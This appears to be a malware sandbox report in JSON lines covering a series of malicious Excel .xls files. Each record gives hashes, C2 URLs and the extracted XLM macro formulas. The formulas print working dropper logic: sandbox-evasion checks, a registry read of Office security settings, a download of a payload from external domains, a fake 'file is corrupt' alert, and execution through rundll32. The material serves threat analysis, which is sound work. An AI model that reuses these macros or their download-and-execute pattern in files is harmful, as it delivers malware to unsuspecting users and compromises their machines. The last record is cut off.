{"version":"0.2","sample":{"sample":"","kind":"file","target":"17b0144c78d2b5d23efcba0f7cbb75c7bf9a849b0e99b672fdcfb826fea81a37"},"analysis":{"reported":"2020-04-09T16:15:04Z","score":10},"files":[{"filename":"17b0144c78d2b5d23efcba0f7cbb75c7bf9a849b0e99b672fdcfb826fea81a37","filesize":214016,"md5":"fa8d2f11ac5009b668c87b440931992b","sha1":"cf0e10eed9da7baa9e3cf5e06574a03969c3cb68","sha256":"17b0144c78d2b5d23efcba0f7cbb75c7bf9a849b0e99b672fdcfb826fea81a37","sha512":"ae5579e09f9d310a0a8cddf9f5594aef120d496f4261cf6d3018f23000ce7fa075a09b9b6a44f677f68703b5eb3481fa6fe77067268ff4f2e18028e474bfae3e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"17b0144c78d2b5d23efcba0f7cbb75c7bf9a849b0e99b672fdcfb826fea81a37.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv42g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv42g\",\"c:\\Users\\Public\\bug65ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"eNHrPh89X2\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"17b1017dfa17b9c2cf39690e00f5f876de80a35ea62cecdd6ee898805baaf76d"},"analysis":{"reported":"2020-04-09T16:15:04Z","score":10},"files":[{"filename":"17b1017dfa17b9c2cf39690e00f5f876de80a35ea62cecdd6ee898805baaf76d","filesize":116224,"md5":"7aeeaea151190020caa62eefc8681d5d","sha1":"0472bc211b88dd2b29e1002262c159f489fb16fd","sha256":"17b1017dfa17b9c2cf39690e00f5f876de80a35ea62cecdd6ee898805baaf76d","sha512":"dadbadba1bd6d7ba07ae4e46374a3f38cbb0baf660c925ac3f0b54d6acc4712e6c847ceb8d58cae47d34e0d8e38a6c218c1345b8393077d3b364edf472c1e65f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"17b1017dfa17b9c2cf39690e00f5f876de80a35ea62cecdd6ee898805baaf76d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"XOAvYKbfKw\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"17bed1c7344f70bd758acc4d9150674431deecd92483926c688e6f8265f17de3"},"analysis":{"reported":"2020-04-09T16:15:04Z","score":10},"files":[{"filename":"17bed1c7344f70bd758acc4d9150674431deecd92483926c688e6f8265f17de3","filesize":209920,"md5":"e4af9dca88afd047ce45523a9d3860ee","sha1":"8653daacb201fabb3f3c169b5e68307e64ba0a88","sha256":"17bed1c7344f70bd758acc4d9150674431deecd92483926c688e6f8265f17de3","sha512":"de8eb78d0b0e683358789ecfadffe1c1cd313a01dc6d65b10f584b1863dadd0293464ac3c290f6c43c03b0197ba38e143aa28c2f42320977353eac5b687a1387","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"17bed1c7344f70bd758acc4d9150674431deecd92483926c688e6f8265f17de3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"f139REWBwc\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"17c16d9ff82677c14b6fb99b35c66ac28b44f9c0ad75c01b5e66f9a4b1e0d88b"},"analysis":{"reported":"2020-04-09T16:15:04Z","score":10},"files":[{"filename":"17c16d9ff82677c14b6fb99b35c66ac28b44f9c0ad75c01b5e66f9a4b1e0d88b","filesize":177152,"md5":"b66a1527efbfe401a9e3605cbdf9b50c","sha1":"1bc3e0a46c60ff2104d1e4baf749874570a9f061","sha256":"17c16d9ff82677c14b6fb99b35c66ac28b44f9c0ad75c01b5e66f9a4b1e0d88b","sha512":"b46dc2d2ec5afa0cd211b6393910c8143ae4fe9d6ae90ddb3aa63d5af3f68ab96312c78a4bf4a794f1137a25b01d24c186ff2226be9457d268891da84308c77d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"17c16d9ff82677c14b6fb99b35c66ac28b44f9c0ad75c01b5e66f9a4b1e0d88b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"AyDA9obCoB\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"17c22e5fb4e7d9833ad3a3bb99d2dbceec35d65ca3df2f2f594447a6d43256cf"},"analysis":{"reported":"2020-04-09T16:15:04Z","score":10},"files":[{"filename":"17c22e5fb4e7d9833ad3a3bb99d2dbceec35d65ca3df2f2f594447a6d43256cf","filesize":221184,"md5":"5b4640120e15f220fe3ba05df388e803","sha1":"500e325d246805a2922ebc8906acfe78a8393ef2","sha256":"17c22e5fb4e7d9833ad3a3bb99d2dbceec35d65ca3df2f2f594447a6d43256cf","sha512":"e699f940136ca31d51850b66a5c1c52b2f8f8a007604789786c6312351e4307072f866a4f15864fe895efef0ea7979a53e58307e6e201cc91de1a170f77d55ce","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"17c22e5fb4e7d9833ad3a3bb99d2dbceec35d65ca3df2f2f594447a6d43256cf.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"wu93ecGFih\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"17d44a35745557ada63426cd99358b9d686c5e990514a6e4a3cc2cfdc1b8d389"},"analysis":{"reported":"2020-04-09T16:15:04Z","score":10},"files":[{"filename":"17d44a35745557ada63426cd99358b9d686c5e990514a6e4a3cc2cfdc1b8d389","filesize":209920,"md5":"34d0644d2a9f7adf9fe0252032799099","sha1":"9ecad09dd4ed89bc1d1f1c54f4e9a22f55c1806c","sha256":"17d44a35745557ada63426cd99358b9d686c5e990514a6e4a3cc2cfdc1b8d389","sha512":"69dddcd8c742d66b3e411be37a695bec8220fcdeb558792d2c64e20595d9d789823833135df0079ca8b7934891c2050d086e73f980329701d5dbc4732af331d8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"17d44a35745557ada63426cd99358b9d686c5e990514a6e4a3cc2cfdc1b8d389.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"BEAFDZUj4N\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"17dc687c5053452c5b877f5f15884737cb3c328264678a65af7b88188ec0ab81"},"analysis":{"reported":"2020-04-09T16:15:04Z","score":10},"files":[{"filename":"17dc687c5053452c5b877f5f15884737cb3c328264678a65af7b88188ec0ab81","filesize":206336,"md5":"0716780081edd2d331cfd0d95ecbdd60","sha1":"331fbdc9c2642c1189949554d315e93bb2948e25","sha256":"17dc687c5053452c5b877f5f15884737cb3c328264678a65af7b88188ec0ab81","sha512":"bab69a82205e80d0b4def60de099e586594d6176bc87ee6a49ab7539e4a5c4f2666feee38bd64b8952c9f9db4edbc7ca5c3bc6f5d9904c2f34c035fb30cd5542","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"17dc687c5053452c5b877f5f15884737cb3c328264678a65af7b88188ec0ab81.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"0pbHtXQs8P\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"17e084f7c98579a10f169f3f33ff69978c93fe076ac74168f1044a3bbcf45a5c"},"analysis":{"reported":"2020-04-09T16:15:04Z","score":10},"files":[{"filename":"17e084f7c98579a10f169f3f33ff69978c93fe076ac74168f1044a3bbcf45a5c","filesize":113664,"md5":"8bc19f583c18e3d0a5179c2173bbda9e","sha1":"3d9364fd3603f68e27ea7ab39ee8e17b0db523dc","sha256":"17e084f7c98579a10f169f3f33ff69978c93fe076ac74168f1044a3bbcf45a5c","sha512":"e7c1176c4f224132eb1a1090cd88f6d8c42b631516e208cabf8dc0a5445637005d9239ace915027626318ba9098dc8dec8cc053de5b8a6ee305ee700f8f23db0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"17e084f7c98579a10f169f3f33ff69978c93fe076ac74168f1044a3bbcf45a5c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"wK1rNzHGSB\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"17e28b1ef5118bc7ebfccb37b001fcc83dbedf9c4206f2a806c0f9b70ab0943c"},"analysis":{"reported":"2020-04-09T16:15:04Z","score":10},"files":[{"filename":"17e28b1ef5118bc7ebfccb37b001fcc83dbedf9c4206f2a806c0f9b70ab0943c","filesize":206336,"md5":"b7976accfb21373be669038573bd8d8a","sha1":"efa97de68a3a3bcf43fdfbd11f915a7ba24b9570","sha256":"17e28b1ef5118bc7ebfccb37b001fcc83dbedf9c4206f2a806c0f9b70ab0943c","sha512":"cc8e365477ad43cc6f731965a96645aa80f69411a048f4cf01bf668efb131c8d4b77a688ad3ccdd19b78af92e39fbbbaf4c914c26ca6ddd7b834c8f94bf67e60","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"17e28b1ef5118bc7ebfccb37b001fcc83dbedf9c4206f2a806c0f9b70ab0943c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"5Irgw76taY\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"17e3764a4183fc40b68bca58769414185580f8db97c46ee4944f6efe24ba2789"},"analysis":{"reported":"2020-04-09T16:15:04Z","score":10},"files":[{"filename":"17e3764a4183fc40b68bca58769414185580f8db97c46ee4944f6efe24ba2789","filesize":170496,"md5":"c45586f69fbdf154f7d195bd7d7a3735","sha1":"81c07cf95d9c49e35fc073429868361a03625a2c","sha256":"17e3764a4183fc40b68bca58769414185580f8db97c46ee4944f6efe24ba2789","sha512":"f3b61576a98ed2b0df257facabfcfbdc6ad283fa0c3480d5bc0eb498481d1d92672249762434813cd0d847f65c26ac4f13162a5e70ea2c3c62780abd17949df1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"17e3764a4183fc40b68bca58769414185580f8db97c46ee4944f6efe24ba2789.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"eIrXCzfvhT\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"17eb0bb88351adeaec92a8a31735f58574c4a3492b147e412edbf4b9013ecbcf"},"analysis":{"reported":"2020-04-09T16:15:04Z","score":10},"files":[{"filename":"17eb0bb88351adeaec92a8a31735f58574c4a3492b147e412edbf4b9013ecbcf","filesize":225280,"md5":"4046bef5ba269e6044cfc87aab4c78e4","sha1":"1dce237ae4d6eb33449d9c47a176a9ce54e6d84f","sha256":"17eb0bb88351adeaec92a8a31735f58574c4a3492b147e412edbf4b9013ecbcf","sha512":"df5efa65fac66f6eb9f3aea2e38ef36e574ab169b2b5bfaca727021e3f0fe31696c80bcd7bec202c2046137a1f00f5d795637a18fc0e81920dc10907bd0bcb02","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"17eb0bb88351adeaec92a8a31735f58574c4a3492b147e412edbf4b9013ecbcf.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"LFvpc5mN00\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"17f0df4bcdecef88fc634fee9ec560cd81e935b3bdab569ce58536039074da73"},"analysis":{"reported":"2020-04-09T16:15:04Z","score":10},"files":[{"filename":"17f0df4bcdecef88fc634fee9ec560cd81e935b3bdab569ce58536039074da73","filesize":212992,"md5":"2abfbaefffe51d1f6992a414dac37e44","sha1":"a53098e2098818a290c652c0ef5483ce8e06d23e","sha256":"17f0df4bcdecef88fc634fee9ec560cd81e935b3bdab569ce58536039074da73","sha512":"fb393c5ed4e39d92f688a2aa30beea7681b2f86fa72cf546be74cef266f2bfde4248a4a8df9be51cb994c32bd53d77ed0fd1bd2613690752acf73d7c63388ca0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"17f0df4bcdecef88fc634fee9ec560cd81e935b3bdab569ce58536039074da73.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"iUMcuYCtgM\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"17f7fba52659e49bbcd788022bc079ed9a0028680c5ce9cb09b6ccc148cf7d9b"},"analysis":{"reported":"2020-04-09T16:15:04Z","score":10},"files":[{"filename":"17f7fba52659e49bbcd788022bc079ed9a0028680c5ce9cb09b6ccc148cf7d9b","filesize":226304,"md5":"7832e1feca9a8c08cb290a2e344480e6","sha1":"c7a0abf0d9fb3f240fb9e3c63031796a3fa9003a","sha256":"17f7fba52659e49bbcd788022bc079ed9a0028680c5ce9cb09b6ccc148cf7d9b","sha512":"0efb8542334b628b82ddfe69895c628a0c49b0f25bb402fd334f36c80771d583231fcf334bf17daec19362e9a0174fe5358614f20ca338f15b96ba5de56c4865","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"17f7fba52659e49bbcd788022bc079ed9a0028680c5ce9cb